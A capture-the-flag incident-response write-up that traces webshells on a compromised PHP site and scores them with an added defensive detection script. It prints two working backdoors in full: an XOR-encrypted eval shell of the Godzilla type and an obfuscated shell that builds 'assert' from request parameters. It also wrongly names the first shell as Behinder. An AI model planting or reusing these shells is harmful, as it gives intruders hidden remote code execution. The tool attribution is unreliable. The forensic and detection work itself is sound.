Chapter 1: Incident Response - Webshell Hunting

Task requirements
1. The flag inside the attacker's webshell: flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2. The MD5 of the GitHub address of the tool whose shell the attacker used: flag{md5}
3. The MD5 of the full path of the shell the attacker hid: flag{md5} (note: the form is /xxx/xxx/xxx/xxx/xxx.xxx)
4. The MD5 of the full path of the attacker's AV-evading (免杀) shell: flag{md5}

After connecting to the target machine, use tar to pack up the website source code:
tar -zcvf html.tar.gz /var/www/html
Then upload the archive to an online webshell scanning site.

The first flag is found in the file /var/www/html/include/gz.php:

root@ip-10-0-10-3:/var/www/html# cat /var/www/html/include/gz.php  
<?php  
@session_start();  
@set_time_limit(0);  
@error_reporting(0);  
function encode($D,$K){  
    for($i=0;$i<strlen($D);$i++) {  
        $c = $K[$i+1&15];  
        $D[$i] = $D[$i]^$c;  
    }  
    return $D;  
}  
//027ccd04-5065-48b6-a32d-77c704a5e26d  
$payloadName='payload';  
$key='3c6e0b8a9c15224a';  
$data=file_get_contents("php://input");  
if ($data!==false){  
    $data=encode($data,$key);  
    if (isset($_SESSION[$payloadName])){  
        $payload=encode($_SESSION[$payloadName],$key);  
        if (strpos($payload,"getBasicsInfo")===false){  
            $payload=encode($payload,$key);  
        }  
                eval($payload);  
        echo encode(@run($data),$key);  
    }else{  
        if (strpos($data,"getBasicsInfo")!==false){  
            $_SESSION[$payloadName]=encode($data,$key);  
        }  
    }  
}  
  

flag{027ccd04-5065-48b6-a32d-77c704a5e26d}
This is clearly a Behinder (冰蝎) shell; find the GitHub address and submit its MD5.

f10wers13eicheng@MacBookPro [21时41分00秒] [~/Desktop]   
-> % md5 -s 'https://github.com/BeichenDream/Godzilla'  
MD5 ("https://github.com/BeichenDream/Godzilla") = 39392de3218c333f794befef07ac9257  

flag{39392de3218c333f794befef07ac9257}
The third flag is the path of the hidden shell file, /var/www/html/include/Db/.Mysqli.php:

f10wers13eicheng@MacBookPro [21时39分52秒] [~/Desktop]   
-> % md5 -s '/var/www/html/include/Db/.Mysqli.php'    
MD5 ("/var/www/html/include/Db/.Mysqli.php") = aebac0e58cd6c5fad1695ee4d1ac1919  

The fourth flag is the path of the AV-evading shell. In the 河马 (Hema) scan results one file stands out: it is flagged as a webshell only by the machine-learning detector, so inspect it:

root@ip-10-0-10-3:/var/www/html# cat /var/www/html/wap/top.php  
<?php  
  
$key = "password";  
  
//ERsDHgEUC1hI  
$fun = base64_decode($_GET['func']);  
for($i=0;$i<strlen($fun);$i++){  
    $fun[$i] = $fun[$i]^$key[$i+1&7];  
}  
$a = "a";  
$s = "s";  
$c=$a.$s.$_GET["func2"];  
$c($fun);  

It is indeed an AV-evading shell: the function name is assembled at runtime from "a" . "s" . $_GET["func2"] and the argument is XOR-decoded from $_GET['func'], so nothing in the file matches a plain-text signature.
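The two shells found above (gz.php and wap/top.php) share a handful of source-level traits that a signature scanner can miss but a trait-based triage can still catch: eval of a variable, a raw php://input read, a byte-wise XOR loop keyed off a hardcoded string, a function name assembled from request parameters, and a hidden dotfile inside the web root. The following Python script is an added example written for this writeup, not the author's tooling and not the rules of 河马 or any other scanner; the indicator regexes, weights and the three embedded PHP samples are constructed for illustration. It scans a copy of the web root (for instance the extracted html.tar.gz) and prints the highest-scoring files first.

```python
"""Trait-based PHP webshell triage (added example, constructed for this writeup).

Each indicator is a regex over the file source plus a weight; a file's score is
the sum of the weights of the indicators that fire. Hidden dotfiles ending in
.php get an extra path-based hit. Review high scores by hand; this is triage,
not proof."""
import os
import re
import sys

# (name, regex, weight) -- weights are constructed for this example.
INDICATORS = [
    # eval($payload) / @eval($x): code comes from a variable, not the file
    ("eval_of_variable", re.compile(r"\beval\s*\(\s*@?\$\w+"), 4),
    # file_get_contents("php://input"): raw POST body fed into a decoder
    ("raw_post_body", re.compile(r"file_get_contents\s*\(\s*['\"]php://input"), 3),
    # $D[$i] = $D[$i] ^ $K[...]: byte-wise XOR loop with a hardcoded key
    ("xor_byte_loop", re.compile(r"\$\w+\[\s*\$\w+\s*\]\s*\^\s*\$\w+"), 3),
    # base64_decode($_GET[...]): request parameter decoded before use
    ("decode_request_param", re.compile(r"base64_decode\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"), 3),
    # $c = "a" . "s" . $_GET["func2"]: function name built from the request
    ("func_name_from_request", re.compile(r"\.\s*\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*;"), 4),
    # $c($fun): variable function call, the actual dispatch in top.php
    ("variable_function_call", re.compile(r"^\s*\$\w+\s*\(\s*\$\w+\s*\)\s*;", re.M), 2),
    # error_reporting(0): low weight on its own, common in shells
    ("error_silencing", re.compile(r"error_reporting\s*\(\s*0\s*\)"), 1),
]
HIDDEN_DOTFILE_WEIGHT = 3


def scan_source(rel_path, source):
    """Return {"path", "score", "hits"} for one PHP file's source text."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    base = os.path.basename(rel_path)
    if base.startswith(".") and base.lower().endswith(".php"):
        hits.append("hidden_php_dotfile")
        score += HIDDEN_DOTFILE_WEIGHT
    return {"path": rel_path, "score": score, "hits": hits}


def scan_tree(root):
    """Walk a web root copy and return flagged files, highest score first."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            r = scan_source(os.path.relpath(full, root), src)
            if r["score"] > 0:
                results.append(r)
    return sorted(results, key=lambda r: -r["score"])


# Constructed samples carrying the traits of the two shells in the writeup and
# one benign file; they are not copies of the files on the target.
SAMPLE_GZ = """<?php
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++){ $D[$i] = $D[$i]^$K[$i+1&15]; }
    return $D;
}
$data=file_get_contents("php://input");
$payload=encode($_SESSION['payload'],'0123456789abcdef');
eval($payload);
"""
SAMPLE_TOP = """<?php
$key = "password";
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){ $fun[$i] = $fun[$i]^$key[$i+1&7]; }
$c = "as" . $_GET["func2"];
$c($fun);
"""
SAMPLE_BENIGN = """<?php
require_once __DIR__ . '/config.php';
$db = new mysqli($host, $user, $pass, $name);
$stmt = $db->prepare("SELECT id FROM users WHERE email = ?");
$stmt->bind_param("s", $_POST["email"]);
$stmt->execute();
echo json_encode(["ok" => true]);
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for r in scan_tree(sys.argv[1]):        # e.g. python triage.py ./var/www/html
            print(f"{r['score']:3d}  {r['path']}  {', '.join(r['hits'])}")
    else:
        for path, src in [("include/gz.php", SAMPLE_GZ), ("wap/top.php", SAMPLE_TOP),
                          ("include/Db/.Conn.php", SAMPLE_BENIGN), ("index.php", SAMPLE_BENIGN)]:
            print(scan_source(path, src))
```

Run with no arguments it scores the three constructed samples; with a directory argument it walks that tree. The benign file scores 0 even though it touches $_POST, because the indicators look for data being decoded and executed rather than merely read, and the same benign source placed at a dotfile path (include/Db/.Conn.php, a constructed name) still earns a path-based hit, which is exactly how the hidden .Mysqli.php in this challenge would surface.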

f10wers13eicheng@MacBookPro [21时39分59秒] [~/Desktop]   
-> % md5 -s '/var/www/html/wap/top.php'             
MD5 ("/var/www/html/wap/top.php") = eeff2eabfd9b7a6d26fc1a53d3f7d1de  

flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}
